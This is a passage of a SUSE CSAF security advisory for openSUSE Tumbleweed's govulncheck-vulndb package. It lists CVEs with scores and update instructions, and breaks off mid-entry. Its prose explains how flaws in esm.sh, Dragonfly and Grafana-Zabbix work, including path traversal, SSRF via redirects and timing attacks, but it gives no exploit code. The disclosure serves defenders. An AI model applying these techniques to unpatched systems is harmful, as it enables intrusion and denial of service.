| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
5.3 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
9.8 (Critical)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
critical
7.5 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.3 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
7.2 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
6.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
References
34 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "govulncheck-vulndb-0.0.20250924T192141-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the govulncheck-vulndb-0.0.20250924T192141-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15576",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15576-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-10630 page",
"url": "https://www.suse.com/security/cve/CVE-2025-10630/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59341 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59341/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59342 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59342/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59345 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59345/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59346 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59346/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59347 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59347/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59348 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59348/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59350 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59350/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59351 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59351/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59352 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59352/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59353 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59353/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59354 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59354/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59410 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59410/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9081/"
}
],
"title": "govulncheck-vulndb-0.0.20250924T192141-1.1 on GA media",
"tracking": {
"current_release_date": "2025-09-25T00:00:00Z",
"generator": {
"date": "2025-09-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15576-1",
"initial_release_date": "2025-09-25T00:00:00Z",
"revision_history": [
{
"date": "2025-09-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"product": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"product_id": "govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"product": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"product_id": "govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"product": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"product_id": "govulncheck-vulndb-0.0.20250924T192141-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64",
"product": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64",
"product_id": "govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64"
},
"product_reference": "govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le"
},
"product_reference": "govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x"
},
"product_reference": "govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
},
"product_reference": "govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-10630",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-10630"
}
],
"notes": [
{
"category": "general",
"text": "Grafana is an open-source platform for monitoring and observability. Grafana-Zabbix is a plugin for Grafana allowing to visualize monitoring data from Zabbix and create dashboards for analyzing metrics and realtime monitoring. \n\n\n\nVersions 5.2.1 and below contained a ReDoS vulnerability via user-supplied regex query which could causes CPU usage to max out. This vulnerability is fixed in version 6.0.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-10630",
"url": "https://www.suse.com/security/cve/CVE-2025-10630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-10630"
},
{
"cve": "CVE-2025-59341",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59341"
}
],
"notes": [
{
"category": "general",
"text": "esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59341",
"url": "https://www.suse.com/security/cve/CVE-2025-59341"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-59341"
},
{
"cve": "CVE-2025-59342",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59342"
}
],
"notes": [
{
"category": "general",
"text": "esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application\u0027s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59342",
"url": "https://www.suse.com/security/cve/CVE-2025-59342"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-59342"
},
{
"cve": "CVE-2025-59345",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59345"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, The /api/v1/jobs and /preheats endpoints in Manager web UI are accessible without authentication. Any user with network access to the Manager can create, delete, and modify jobs, and create preheat jobs. An unauthenticated adversary with network access to a Manager web UI uses /api/v1/jobs endpoint to create hundreds of useless jobs. The Manager is in a denial-of-service state, and stops accepting requests from valid administrators. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59345",
"url": "https://www.suse.com/security/cve/CVE-2025-59345"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-59345"
},
{
"cve": "CVE-2025-59346",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59346"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Versions prior to 2.1.0 contain a server-side request forgery (SSRF) vulnerability that enables users to force DragonFly2\u0027s components to make requests to internal services that are otherwise not accessible to them. The issue arises because the Manager API accepts a user-supplied URL when creating a Preheat job with weak validation, peers can trigger other peers to fetch an arbitrary URL through pieceManager.DownloadSource, and internal HTTP clients follow redirects, allowing a request to a malicious server to be redirected to internal services. This can be used to probe or access internal HTTP endpoints. The vulnerability is fixed in version 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59346",
"url": "https://www.suse.com/security/cve/CVE-2025-59346"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59346"
},
{
"cve": "CVE-2025-59347",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59347"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, The Manager disables TLS certificate verification in HTTP clients. The clients are not configurable, so users have no way to re-enable the verification. A Manager processes dozens of preheat jobs. An adversary performs a network-level Man-in-the-Middle attack, providing invalid data to the Manager. The Manager preheats with the wrong data, which later causes a denial of service and file integrity problems. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59347",
"url": "https://www.suse.com/security/cve/CVE-2025-59347"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59347"
},
{
"cve": "CVE-2025-59348",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59348"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the processPieceFromSource method does not update the structure\u0027s usedTraffic field, because an uninitialized variable n is used as a guard to the AddTraffic method call, instead of the result.Size variable. A task is processed by a peer. The usedTraffic metadata is not updated during the processing. Rate limiting is incorrectly applied, leading to a denial-of-service condition for the peer. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59348",
"url": "https://www.suse.com/security/cve/CVE-2025-59348"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-59348"
},
{
"cve": "CVE-2025-59349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59349"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, DragonFly2 uses the os.MkdirAll function to create certain directory paths with specific access permissions. This function does not perform any permission checks when a given directory path already exists. This allows a local attacker to create a directory to be used later by DragonFly2 with broad permissions before DragonFly2 does so, potentially allowing the attacker to tamper with the files. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59349",
"url": "https://www.suse.com/security/cve/CVE-2025-59349"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2025-59349"
},
{
"cve": "CVE-2025-59350",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59350"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the access control mechanism for the Proxy feature uses simple string comparisons and is therefore vulnerable to timing attacks. An attacker may try to guess the password one character at a time by sending all possible characters to a vulnerable mechanism and measuring the comparison instruction\u0027s execution times. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
